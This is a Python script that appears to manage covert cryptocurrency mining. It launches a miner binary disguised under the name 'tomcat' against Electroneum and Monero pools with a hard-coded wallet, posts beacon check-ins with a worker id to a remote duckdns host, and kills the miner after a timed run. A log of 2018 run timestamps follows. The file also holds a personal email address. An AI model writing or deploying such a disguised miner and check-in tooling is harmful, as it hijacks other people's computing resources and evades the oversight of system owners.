import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:42:01.418568
#2018-02-17 16:28:06.667099
#2018-02-17 18:14:07.372372
#2018-02-17 20:02:02.192898
#2018-02-17 21:50:04.184605
#2018-02-17 23:34:04.927201
#2018-02-18 01:23:06.270657
#2018-02-18 03:10:08.270418
#2018-02-18 04:58:01.953805
#2018-02-18 06:51:06.956591
#2018-02-18 08:39:03.608819
#2018-02-18 10:25:04.572926
#2018-02-18 12:10:08.790647
#2018-02-18 13:58:06.642260
#2018-02-18 15:48:01.532372
#2018-02-18 17:37:07.638015
#2018-02-18 19:25:07.434881
#2018-02-18 21:10:03.690582
#2018-02-18 22:57:03.839814
#2018-02-19 00:45:05.897772
#2018-02-19 02:31:06.085157
#2018-02-19 04:17:06.848168
#2018-02-19 06:02:04.093936
#2018-02-19 07:49:03.806007
#2018-02-19 09:39:04.634498
#2018-02-19 11:27:07.993726
#2018-02-19 13:16:04.006351
#2018-02-19 15:05:06.678840
#2018-02-19 16:52:05.201572
#2018-02-19 18:39:02.151777
#2018-02-19 20:27:07.934057
#2018-02-19 22:14:07.147282
#2018-02-20 00:00:05.687646
#2018-02-20 01:47:05.039730
#2018-02-20 03:34:04.499409
#2018-02-20 05:21:07.697446
#2018-02-20 07:06:07.156807
#2018-02-20 08:52:03.421953
#2018-02-20 10:36:07.924269
#2018-02-20 12:22:06.245398
#2018-02-20 14:10:11.250420
#2018-02-20 15:54:06.746823
#2018-02-20 17:42:07.164544
#2018-02-20 19:32:07.225358
#2018-02-20 21:18:06.144913
#2018-02-20 23:03:04.692584
#2018-02-21 00:48:05.768334
#2018-02-21 02:33:06.546490
#2018-02-21 04:21:07.076479
#2018-02-21 06:09:01.455312
#2018-02-21 07:55:17.550076
#2018-02-21 09:41:08.056537
#2018-02-21 11:29:08.434801
#2018-02-21 13:17:08.423245
#2018-02-21 15:04:10.376109
#2018-02-21 16:55:07.226215
#2018-02-21 18:44:10.876077
#2018-02-21 20:33:10.007110
#2018-02-21 22:20:07.415389
#2018-02-22 00:08:07.601786
#2018-02-22 01:56:01.776838
#2018-02-22 03:43:05.791113
#2018-02-22 05:29:07.378529
#2018-02-22 07:16:06.009827
#2018-02-22 09:03:08.540636
#2018-02-22 10:50:09.124665
#2018-02-22 12:36:10.425367
#2018-02-22 14:22:05.530843
#2018-02-22 16:09:01.463009
#2018-02-22 17:54:12.244555
#2018-02-22 19:44:01.260771
#2018-02-22 21:35:06.653762
#2018-02-22 23:22:08.440402
#2018-02-23 01:09:06.082237
#2018-02-23 02:55:08.667537
#2018-02-23 04:42:06.459904
#2018-02-23 06:28:01.353805
#2018-02-23 08:15:09.161131
#2018-02-23 10:33:07.117597
#2018-02-23 12:24:04.702706
#2018-02-23 14:14:05.134689
#2018-02-23 16:04:03.911326
#2018-02-23 17:52:04.108819
#2018-02-23 19:39:01.295742
#2018-02-23 21:21:07.976894
#2018-02-23 23:08:06.747395
#2018-02-24 00:55:05.795472
#2018-02-24 02:43:07.737452
#2018-02-24 05:29:01.324879
#2018-02-24 07:16:06.104549
#2018-02-24 09:05:04.881712
#2018-02-24 10:42:06.239104
#2018-02-24 12:26:01.653318
#2018-02-24 14:04:03.864760
#2018-02-24 15:41:05.019932
#2018-02-24 17:22:02.217956
#2018-02-24 18:53:01.597535
#2018-02-24 20:27:01.621112
#2018-02-24 21:59:04.108617
#2018-02-25 02:34:05.949196
#2018-02-25 06:15:07.370281
#2018-02-25 11:40:07.815645